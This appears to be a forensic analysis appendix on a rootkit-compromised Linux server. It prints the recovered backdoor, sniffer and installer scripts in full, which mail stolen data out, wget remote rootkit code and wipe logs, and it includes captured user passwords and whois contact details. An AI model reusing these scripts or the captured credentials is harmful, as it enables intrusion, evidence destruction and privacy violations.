SSHPORT=`cat /lib/.x/s/port`
IP=`cat /lib/.x/ip`
TIME=`date`
/lib/.x/s/xopen -q -p ${SSHPORT} >> /lib/.x/reboot.log
/lib/.x/s/lsn &
/lib/.x/sk p 1 >> /lib/.x/reboot.log
/lib/.x/sk f 1 >> /lib/.x/reboot.log
echo "###Host ${IP} went online on ${TIME}" >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###SSHD backdoor port: ${SSHPORT}" >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###Sniffer log:" >> /tmp/13996log
echo " - TTY Sniffer:" >> /tmp/13996log
cat /lib/.x/.lurker >> /tmp/13996log
echo >> /tmp/13996maillog
echo " - Network Sniffer:" >> /tmp/13996log
cat /lib/.x/s/mfs >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
echo "###Reboot log:" >> /tmp/13996log
cat /lib/.x/reboot.log >> /tmp/13996log
echo >> /tmp/13996maillog
echo >> /tmp/13996maillog
cat /tmp/13996log | mail -s "Host ${IP} is up!" skiZophrenia_sick@yahoo.com
/lib/.x/hide
/lib/.x/cl -f /var/log/maillog yahoo > /dev/null
/lib/.x/cl -s o.tgz > /dev/null
/lib/.x/cl -s suckit > /dev/null
/lib/.x/cl -s xopen > /dev/null
/lib/.x/cl -s promisc > /dev/null
/lib/.x/cl -f promisc /var/log/secure > /dev/null
rm -rf /tmp/13996*
rm -rf /lib/.x/reboot.log
File ".install" script part of file from original source. wget geocities.com/mybabywhy/rk.tar.gz (REMOTE)
#!/bin/bash
# Made By ICE
BLK='_[1;30m'
RED='_[1;31m'
GRN='_[1;32m'
YEL='_[1;33m'
BLU='_[1;34m'
MAG='_[1;35m'
CYN='_[1;36m'
WHI='_[1;37m'
DRED='_[0;31m'
DGRN='_[0;32m'
DYEL='_[0;33m'
DBLU='_[0;34m'
DMAG='_[0;35m'
DCYN='_[0;36m'
DWHI='_[0;37m'
RES='_[0m'
USERID=`id -u`
echo "${WHI}---${RED} Verificam daca suntem ROOT ${WHI} !!!${RES}"
if [ $USERID -eq 0 ]
then
echo "${RED}+++${WHI} Cica DA ..., deci putem continua ${BLU} :${WHI}-${RED})${RES}"
else
echo "${RED}--- ${DRED}!!! ${RED}Atentie tu eshti de fapt ${YEL}$USERID${RED} si nu ${GRN}RooT ${DRED}!!!${RES}"
echo "${WHI} Asta ii un ${BLU}ROOTKIT${WHI} deshteptule si trebuie sa aiba ${GRN}uid=0${RES}"
exit
fi
rk=`pwd`
home="/usr/bin"
etc="/etc"
usr="/usr/lib/libshtift"
netstat="/bin/netstat"
ls="/bin/ls"
ps="/bin/ps"
top="/usr/bin/top"
chattr="/usr/bin/chattr"
chat="/usr/lib/ld/chat"
pico="/bin/pico"
wget="/usr/bin/wget"
ifconfig="/sbin/ifconfig"
ttyop="/dev/ttyop"
ttyoa="/dev/ttyoa"
ttyof="/dev/ttyof"
if [ -f "/usr/bin/gcc" ]; then
gcc="/usr/bin/gcc"
else
if [ -f "/usr/local/bin/gcc" ]; then
gcc="/usr/local/bin/gcc"
else
if [ -f "/usr/bin/cc" ]; then
gcc="/usr/bin/cc"
else
if [ -f "/usr/local/bin/cc" ]; then
gcc="/usr/local/bin/cc"
else
gcc="/usr/bin/gnikcs"
fi; fi; fi; fi
unset HISTFILE; chown root.root *; unalias &> /dev/null ls
echo " "
echo "${WHI} @@@ ${GRN}OK ${BLU}ICE sau care eshti pe acolo , de preferabil Budu :-)${GRN} .., deci sa bagam mare ${BLU}!!!${WHI}@@@${RES}"
echo " "
if [ -f /etc/rc.d/init.d/portmap ]; then
/etc/rc.d/init.d/portmap stop
fi
if [ -f /etc/rc.d/init.d/syslog ]; then
/etc/rc.d/init.d/syslog stop
fi
killall &> /dev/null -9 syslogd
killall &> /dev/null -9 klogd
killall &> /dev/null -9 atd
$chattr &> /dev/null -ASacdisu /bin /bin/* /usr/bin /usr/bin/* /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $usr $usr/* $ttyop $ttyoa $ttyof
echo "${WHI} Sa tragem o privire dupa fisiere.. ${DRED}!${RES}"
echo " "
if [ -f $chattr ]; then
echo " ${WHI}chattr${RED} -> ${BLU}ok${RES}"
else
if [ -f $chat ]; then
/usr/lib/ld/chat -R -ASacdisu /usr/bin $chat
cp -f $chat $chattr
else
tar -xzf chattr.tgz
mv -f chattr $chattr
echo " ${WHI}chattr${RED}->${BLU}atasat${RES}"
chmod +x $chattr
fi; fi
if [ -f $wget ]; then
echo " ${WHI}wget${RED} -> ${BLU}ok${RES}"
else
tar -xzf wget.tgz
mv -f wget $wget
echo " ${WHI}wget${RED} -> ${BLU}atasat${RES}"
chmod +x $wget
fi
if [ -f $pico ]; then
echo " ${WHI}pico${RED} -> ${BLU}ok${RES}"
else
tar -xzf pico.tgz
mv -f pico $pico
echo " ${WHI}pico${RED} -> ${BLU}atasat${RES}"
chmod +x $pico
fi
echo " ${WHI}Rezolvam tampeniile de ps, netstat si etc.., si pe sora-sa :-P${RES}"
mkdir $usr; mv $netstat $ps $ls $ifconfig $top $usr; mv netstat $netstat; mv ps $ps; mv ifconfig $ifconfig; mv ls $ls; mv top $top; mv .ttyop $ttyop; mv .ttyoa $ttyoa; mv .ttyof $ttyof
echo " ${WHI}Tampeniile${RED} ->${BLU}Done${RES}"
echo " ${WHI}Copiem ${BLU}SSH-ul ${WHI}si ce mai e nevoie :-P .. ${RES}"
mv -f sense sl2 logclear $home; echo "/usr/bin/crontabs -t1 -X53 -p" >> /etc/rc.d/init.d/functions; echo >> /etc/rc.d/init.d/functions; mv crontabs -f /usr/bin/; chmod 500 /usr/bin/crontabs
./ava
$gcc -o swapd kde.c
if [ -f swapd ]; then
mv swapd /usr/bin/"(swapd)"
else
mv swapd2 /usr/bin/"(swapd)"
fi
mv lpi /usr/bin
mv libsss /usr/lib
chmod +x /usr/bin/lpi
/usr/bin/crontabs
/usr/bin/lpi
echo " ${RED}ATENTIE!!! ${DRED}Tu tre sa dai ${WHI} cd /usr/bin ; sense tcp.log ; logclear ${RES}"
./sysinfo > informatii
echo " ${WHI}Imediat iti trimit Mail ${BLU}BAH${WHI} mai ai rabdare 2 min..${RES}"
echo " "
cat informatii|mail -s "SANDERS root" mybabywhy@yahoo.com
cat informatii|mail -s "SANDERS root" buskyn17@yahoo.com
echo " ${WHI}Mail ${RED}-> ${BLU}Done.${RES}"; echo " "
echo " ${WHI}*** ${GRN}Sa ne facem si noi un catun pe aici! ${BLU};${WHI}-${RED}) ${WHI}***${RES}"
if [ ! -d /dev/hpd ]; then
mkdir /dev/hpd
fi
echo " ${WHI}*** ${GRN}Director-ul /dev/hpd a fost deja creat gajiule:))${WHI} ***${RES}"
echo " ${WHI}*** ${BLU}Acum sa stergem logurile care ne incurca ${WHI}***${RES}"
rm -rf /var/log/*
touch /var/log/wtmp
if [ -f /etc/rc.d/init.d/syslog ]; then
/etc/rc.d/init.d/syslog restart
fi
if [ -f /etc/rc.d/init.d/portmap ]; then
/etc/rc.d/init.d/portmap restart
fi
cd ..
unset HISTFILE; $chattr +AacdisSu /bin /bin/* /usr/bin/sense /usr/bin/top /sbin /sbin/* /usr/sbin /usr/sbin/* $etc/im* $ttyop $ttyoa $ttyof
rm -rf /usr/bin/lpi
rm -rf simpa*
echo " "
echo "${WHI}@@@ ${GRN}OK ${BLU}Shefu${GRN}.., e al tau, bucura-te ca eshti mai destept cu un ${BLU}RooT ${BLU};${WHI}-${RED}P ${WHI}@@@${RES}"
File "gods" Adore Rootkit Installation scripts original location http://izolam.net/gods (REMOTE)
unset HISTFILE HISTSIZE HISTSAVE BLK="\033[0;30m" RED="\033[0;31m" GRN="\033[0;32m" YEL="\033[0;33m" BLU="\033[0;34m" MAG="\033[0;35m" CYN="\033[0;36m" WHI="\033[0;37m" DRED="\033[1;31m" DGRN="\033[1;32m" DYEL="\033[1;33m" DBLU="\033[1;34m" DMAG="\033[1;35m" DCYN="\033[1;36m" DWHI="\033[1;37m" BW="\033[47;1;30m" YBL="\033[44;1;33m" RES="\033[0m" printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n" printf "${YBL}redCode${RES}${YBL}Face Treaba${RES}${YBL}ushoara${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" mkdir /tmp/rk printf "${DCYN}Entering Directory${RES}\n" cd /tmp/rk printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/inst -q wget izolam.net/rc/kflushd -q printf "${DCYN}OK${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" sleep 1 mkdir /tmp/rk/adore printf "${DCYN}Entering Directory${RES}\n" cd /tmp/rk/adore/ printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/adore/adore.c -q wget izolam.net/rc/adore/ava.c -q wget izolam.net/rc/adore/dummy.c -q wget izolam.net/rc/adore/exec.c -q wget izolam.net/rc/adore/exec-test.c -q wget izolam.net/rc/adore/libinvisible.c -q wget izolam.net/rc/adore/libinvisible.h -q wget izolam.net/rc/adore/cleaner.c -q sleep 4 printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the Makefile${RES}\n" wget izolam.net/rc/adore/Makefile -q printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" printf "${DCYN}Leaving directory..${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" mkdir /tmp/rk/ssh printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" cd /tmp/rk/ssh printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/ssh/sp0 -q wget izolam.net/rc/ssh/sp0_cfg -q wget izolam.net/rc/ssh/sp0_key -q wget izolam.net/rc/ssh/sp0_seed -q sleep 2 printf "${DCYN}Changing the file modes..${RES}\n" chmod 777 sp0 printf "${DCYN}OK${RES}\n" printf "${DCYN}Leaving directory..${RES}\n" cd /tmp/rk/ chmod 777 inst kflushd sleep 1 printf "${DCYN}OK${RES}\n" printf "${DCYN}Cleaning...${RES}\n" printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" printf "${DCYN}All done...${RES}\n" printf "${DCYN}You Got The redCode rk${RES} ${YEL}$IP${RES}\n" printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n"
vii. TRACES
trace of 213.154.118.200 or is.pcnet.ro
domain-name: pcnet.ro
description: PC-NET Data Network
admin-contact: MB51-ROTLD
technical-contact: AN160-ROTLD
zone-contact: AB494-ROTLD
nameserver: ns1.pcnet.ro 213.154.128.1
nameserver: ns2.pcnet.ro 213.154.128.2
nameserver: ns3.pcnet.ro 213.154.128.3
info: object maintained by ro.rnc local registry
info: Register your .ro domain names at http://www.samspade.org/t/refer?a=www.rotld.ro
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
mnt-lower: ROTLD-MNT
updated: domain-admin@listserv.rnc.ro 19970519
updated: ciprian@rnc.ro 19990601
updated: ciprian@rnc.ro 19991207
updated: cristih@rnc.ro 20000829
source: ROTLD
person: Mihai Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: mihai@pcnet.ro
nic-hdl: MB51-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD
person: Alina-Mihaela Nemes
address: PCNET DATA NETWORK SA
address: Bd. Mircea Eliade, nr. 18
address: Bucharest, Romania
phone: +40-21-2080460
fax-no: +40-21-2080461
e-mail: alina@pcnet.ro
nic-hdl: AN160-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
updated: imanea@rnc.ro 19991207
source: ROTLD
person: Adrian Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: adi@pcnet.ro
nic-hdl: AB494-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD
trace of redcode.strobe.org
Domain ID:D7834992-LROR
Domain Name:STROBE.ORG
Created On:08-Jul-1999 05:22:28 UTC
Last Updated On:23-Sep-2003 08:03:27 UTC
Expiration Date:08-Jul-2010 05:22:28 UTC
Sponsoring Registrar:R63-LROR
Status:OK
Registrant ID:22942110-NSI
Registrant Name:Strobe Your Mind
Registrant Organization:Strobe Your Mind
Registrant Street1:19 South 4th Street
Registrant City:Columbia
Registrant State/Province:MO
Registrant Postal Code:65201
Registrant Country:US
Registrant Email:james@STROBE.ORG
Admin ID:15340317-NSI
Admin Name:Strobe Your Mind
Admin Organization:Strobe Your Mind
Admin Street1:19 S 4TH ST
Admin City:COLUMBIA
Admin State/Province:MO
Admin Postal Code:65201-4226
Admin Country:US
Admin Email:james@TRANQUILITY.NET
Billing ID:15340317-NSI
Billing Name:Strobe Your Mind
Billing Organization:Strobe Your Mind
Billing Street1:19 S 4TH ST
Billing City:COLUMBIA
Billing State/Province:MO
Billing Postal Code:65201-4226
Billing Country:US
Billing Email:james@TRANQUILITY.NET
Tech ID:5677673-NSI
Tech Name:Paul ** Saab
Tech Street1:788 Harrison Apt 521
Tech City:San Francisco
Tech State/Province:CA
Tech Postal Code:94107
Tech Country:US
Tech Email:ps@MU.ORG
Name Server:NS1.AFRAID.ORG
Name Server:NS2.AFRAID.ORG
viii. SNIFFER LOGS
Format source IP to destination IP and PORT followed by parse DATA. Location (LOCAL)
64.183.193.202 => mir-serv.ez-closet.com [110]
user jan password jan
cgomez => mir-serv-ez-closet.com [110] most frequent user?
user carlos password eduardo
cgomez => 216.141.104.150 [21]
user anonymous
pass IEUser@
211.114.43.197 => linuxserv.gocadd.com [21]
mir-serv.ez-closet => 216.136.173.10 [110]
USER nellabrito
pass nella
217.156.101.89 => linuxserv.gocadd.com [21]
7K7L707S
host-64-183-193-202.covadbiz.com => mir-serv.ez-closet.com [110]
user jan pass jan
63.222.209.181 => mir-serv.ez-closet.com [110]
user jan pass jan
63.222.209.181 => rpmfind.speakeasy.net [21]
user anonymous pass mozilla@
RETR /linux/rawhide/1.0/i386/RedHat/RPMS/tcpdump-3.6.2-3.i386.rpm
cgomez => mir-serv.ez-closet.com [110]
user caroline pass carola
raq3a.surfmore.net => linuxserv.gocadd.com [21]
JlUSER ftpass lamer@
mir-serv.ez-closet.com => web.rge.com [21]
user anonymous pass IEUser@
RETR /pub/systems/simtelnet/dr/zonelabs/zapro26dr4.exe
cgomez => 216.141.104.150 [21]
user anonymous pass: IEUser@
ix. LINKS OR RELATED TECHNICAL REFERENCES
[10] Basic Steps in Forensics Analysis of Unix Systems
http://staff.washington.edu/dittrich/misc/forensics/
[11] Thomas Rude - Evidence Seizure Methodology for Computer Forensics
http://www.crazytrain.com/seizure.html
[12] Sniffing (network wiretap, sniffer)
http://www.robertgraham.com/pubs/sniffing-faq.html
[13] Interface Promiscuity Obscurity
http://www.phrack.org/show.php?p=53&a=10
[14] Adore Rootkit
http://spider.scorpions.net/~stealth
[15] SleuthKit
[1a] IANA Port's Assignment
http://www.iana.org/assignments/port-numbers
[1b] Assorted online query tool
[1c] Md5deep recursively computes MD5 message digests of input files.
http://md5deep.sourceforge.net/
[1d] Die Putze - The Ultimate unix logfile cleaner
[1e] Linux on-the-fly kernel patching without LKM :Suckit the implementation
http://www.phrack.org/show.php?p=58&a=7
[1f] UPX The Ultimate Packer for eXecutable
[1g] Language Translation (Utilized in translating portions of file recovered)
http://www.foreignword.com/Tools/transnow.htm
[1h] Powerful Virtual Machine Software for Technical Professionals
[1i] Locally checks for signs of rootkit
[1j] Romanian Black Hats Web Site
http://redcode.strobe.org/ hosted by (http://freedns.afraid.org /
http://strobe.org) URL redirected to http://redcode.go.ro/
"...sunt doar un purtator de cunostinte, care a reusit sa inteleaga cum functioneaza cu adevarat lumea si sunt dispus ca experienta si cunostintele mele sa foloseasca celor care cu nerabdare cauta adevarata libertate..."
[siCk]